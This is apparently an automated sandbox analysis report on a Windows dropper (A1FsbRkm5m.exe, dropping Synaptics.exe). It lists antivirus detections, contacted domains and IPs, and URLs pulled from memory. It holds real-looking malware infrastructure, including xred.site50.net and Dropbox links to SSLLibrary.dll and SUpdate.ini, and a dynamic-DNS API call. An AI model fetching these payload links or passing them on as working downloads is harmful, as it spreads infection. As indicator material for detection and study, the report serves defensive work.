                              2.0.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              2.0.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                              0.0.A1FsbRkm5m.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              0.0.A1FsbRkm5m.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                              2.0.Synaptics.exe.400000.1.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              2.0.Synaptics.exe.400000.1.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                              0.2.A1FsbRkm5m.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              0.2.A1FsbRkm5m.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                              0.0.A1FsbRkm5m.exe.4b8e14.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                              2.0.Synaptics.exe.400000.2.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                              2.0.Synaptics.exe.400000.2.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                              0.2.A1FsbRkm5m.exe.4b8e14.1.unpack100%AviraTR/Patched.Ren.GenDownload File

                              Domains

                              SourceDetectionScannerLabelLink
                              seupdate.360qhcdn.com0%VirustotalBrowse

                              URLs

                              SourceDetectionScannerLabelLink
                              http://www.tiro.comk=60%Avira URL Cloudsafe
                              http://www.sajatypeworks.com0%URL Reputationsafe
                              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                              http://xred.site50.net/syn/SUpdate.iniZ0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SUpdate.ini3%VirustotalBrowse
                              http://xred.site50.net/syn/SUpdate.ini0%Avira URL Cloudsafe
                              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                              http://%s/%s.trt0%Avira URL Cloudsafe
                              http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                              http://www.urwpp.deDPlease0%URL Reputationsafe
                              http://www.zhongyicts.com.cn0%URL Reputationsafe
                              http://www.zhongyicts.com.cn-u0%Avira URL Cloudsafe
                              http://www.galapagosdesign.com/0%URL Reputationsafe
                              http://agd.p.360.cn360s0%Avira URL Cloudsafe
                              http://www.fontbureau.co0%URL Reputationsafe
                              http://www.carterandcone.comq0%URL Reputationsafe
                              http://xred.site50.net/syn/Synaptics.rar0%Avira URL Cloudsafe
                              http://www.carterandcone.comn0%URL Reputationsafe
                              http://%s/gf/360ini.cab0%Avira URL Cloudsafe
                              http://wpad.%s/wpad.dathttp://%s/wpad.datwpad0%Avira URL Cloudsafe
                              http://www.carterandcone.coml0%URL Reputationsafe
                              https://docs.goo0%Avira URL Cloudsafe
                              http://www.carterandcone.com-u0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SSLLibrary.dlp0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware
                              http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/Synaptics.rarZ0%Avira URL Cloudsafe
                              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                              http://www.tiro.com0%URL Reputationsafe
                              http://www.carterandcone.com.A30%Avira URL Cloudsafe
                              http://www.carterandcone.com/0%URL Reputationsafe
                              http://www.zhongyicts.com.cn/0%Avira URL Cloudsafe
                              http://www.goodfont.co.kr0%URL Reputationsafe
                              http://www.carterandcone.com0%URL Reputationsafe
                              http://www.carterandcone.com.0%URL Reputationsafe
                              http://www.typography.netD0%URL Reputationsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		142.250.186.46
                                		truefalse
                                  		high
                                  agd.p.360.cn
                                  		119.188.66.33
                                  		truefalse
                                    		high
                                    agt.p.360.cn
                                    		1.192.136.132
                                    		truefalse
                                      		high
                                      tr-b.p.360.cn
                                      		180.163.229.168
                                      		truefalse
                                        		high
                                        s.360.cn
                                        		171.8.167.89
                                        		truefalse
                                          		high
                                          seupdate.360qhcdn.com
                                          		111.13.65.25
                                          		truefalseunknown
                                          st.p.360.cn
                                          		1.192.136.170
                                          		truefalse
                                            		high
                                            tr.p.360.cn
                                            		unknown
                                            		unknownfalse
                                              		high
                                              xred.mooo.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                pinst.360.cn
                                                		unknown
                                                		unknownfalse
                                                  		high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128EE._cache_A1FsbRkm5m.exe, 00000001.00000002.540644885.0000000003FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://down.360safe.com/setupbeta.exe4._cache_A1FsbRkm5m.exefalse
                                                        		high
                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Synaptics.exe.0.drfalse
                                                          		high
                                                          http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeA1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                            		high
                                                            http://pinst.360.cn/zhuomian/desktopsafe.cabA1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                              		high
                                                              http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128g._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://down.360safe.com/safesetup_2000.exe360A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                    		high
                                                                    http://down.360safe.com/setupbeta.exe4(u7b4NA1FsbRkm5m.exe, Synaptics.exe.0.drfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers._cache_A1FsbRkm5m.exe, 00000001.00000003.393529669.0000000004930000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef._cache_A1FsbRkm5m.exe, 00000001.00000002.539231658.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.540239401.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.tiro.comk=6._cache_A1FsbRkm5m.exe, 00000001.00000003.382553108.0000000004940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          https://docs.google.com/Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://docs.google.com/aSynaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128R._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.sajatypeworks.com._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.founder.com.cn/cn/cThe._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://docs.google.com/delle3mSynaptics.exe, 00000002.00000000.398863393.000000001DC02000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519040121.000000001DC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://xred.site50.net/syn/SUpdate.iniSynaptics.exe.0.drfalse
                                                                                  • 3%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.galapagosdesign.com/DPlease._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://%s/%s.trt._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  http://www.ascendercorp.com/typedesigners.html._cache_A1FsbRkm5m.exe, 00000001.00000003.389473297.000000000492F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.urwpp.deDPlease._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOSynaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.zhongyicts.com.cn._cache_A1FsbRkm5m.exe, 00000001.00000003.383835660.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.383808685.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128x._cache_A1FsbRkm5m.exe, 00000001.00000002.540644885.0000000003FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://pinst.360.cn/360safe/safe_home_new.cabrd=50241128._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128w._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.zhongyicts.com.cn-u._cache_A1FsbRkm5m.exe, 00000001.00000003.383943638.0000000004944000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.383835660.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.383808685.000000000493D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.galapagosdesign.com/._cache_A1FsbRkm5m.exe, 00000001.00000003.400223198.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.400060032.0000000004962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://docs.google.com/CmSynaptics.exe, 00000002.00000000.398863393.000000001DC02000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519040121.000000001DC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://agd.p.360.cn360s._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://down.360safe.com/setupbeta.exe._cache_A1FsbRkm5m.exefalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/soap/encoding/._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=130&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://hao.360.comA1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                                                    		high
                                                                                                    http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safefin._cache_A1FsbRkm5m.exe, 00000001.00000002.538901400.0000000002A26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://bbs.360.cn/thread-15735708-1-1.html._cache_A1FsbRkm5m.exefalse
                                                                                                        		high
                                                                                                        https://docs.google.com/0Synaptics.exe, 00000002.00000000.398863393.000000001DC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.fontbureau.co._cache_A1FsbRkm5m.exe, 00000001.00000003.394939384.0000000004962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.carterandcone.comq._cache_A1FsbRkm5m.exe, 00000001.00000003.385063585.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384877698.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384742874.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384547955.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384617521.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385097383.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385039131.000000000493D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://docs.google.com/-Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cabA1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                                                                		high
                                                                                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safefi._cache_A1FsbRkm5m.exe, 00000001.00000002.540239401.0000000003A10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://xred.site50.net/syn/Synaptics.rarSynaptics.exe.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.360.cn/privacy/v3/360anquanweishi.html._cache_A1FsbRkm5m.exefalse
                                                                                                                    		high
                                                                                                                    http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d._cache_A1FsbRkm5m.exefalse
                                                                                                                      		high
                                                                                                                      https://docs.google.com/&Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.symauth.com/cps0(._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.carterandcone.comn._cache_A1FsbRkm5m.exe, 00000001.00000003.385546737.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385063585.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384877698.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385510639.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385430448.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384742874.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384547955.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384617521.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384414205.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385354347.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384356333.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385097383.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385039131.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384325047.0000000004943000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://%s/gf/360ini.cab._cache_A1FsbRkm5m.exefalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		low
                                                                                                                          http://down.360safe.com/setup.exePathSOFTWAREA1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                                                                            		high
                                                                                                                            http://wpad.%s/wpad.dathttp://%s/wpad.datwpad._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		low
                                                                                                                            http://www.carterandcone.coml._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://docs.google.com/mySynaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128tmp._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.fontbureau.com/designers/frere-jones.html._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.394803344.0000000004962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Synaptics.exe.0.drfalse
                                                                                                                                    		high
                                                                                                                                    http://www.symauth.com/rpa00._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://docs.google.com/uc?id=0BxsMXGfPIZfSVSynaptics.exe, 00000002.00000002.508771368.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.gooSynaptics.exe, 00000002.00000002.519451434.000000001DC70000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.438715068.000000001DC70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=b8a4400180ee20f44982cb4d73d6fcd7&from=safef._cache_A1FsbRkm5m.exe, 00000001.00000002.539066623.0000000002B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.carterandcone.com-u._cache_A1FsbRkm5m.exe, 00000001.00000003.384122490.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384096257.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385546737.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385063585.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384877698.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385297286.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385510639.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385430448.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385249104.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385596847.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385699721.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385726577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384742874.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384547955.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384617521.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384414205.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385354347.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384356333.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384286577.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385097383.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.385039131.000000000493D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://xred.site50.net/syn/SSLLibrary.dlpA1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://down.360safe.com/h11=._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://docs.google.com/ISynaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.360.cnA1FsbRkm5m.exe, Synaptics.exe.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://123.com/A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://xred.site50.net/syn/SSLLibrary.dllSynaptics.exe.0.drtrue
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlA1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cabA1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		low
                                                                                                                                                        http://down.360safe.com/setup.exe._cache_A1FsbRkm5m.exefalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.fontbureau.com/designersG._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcompA1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.fontbureau.com/designers/?._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.founder.com.cn/cn/bThe._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.fontbureau.com/designers?._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
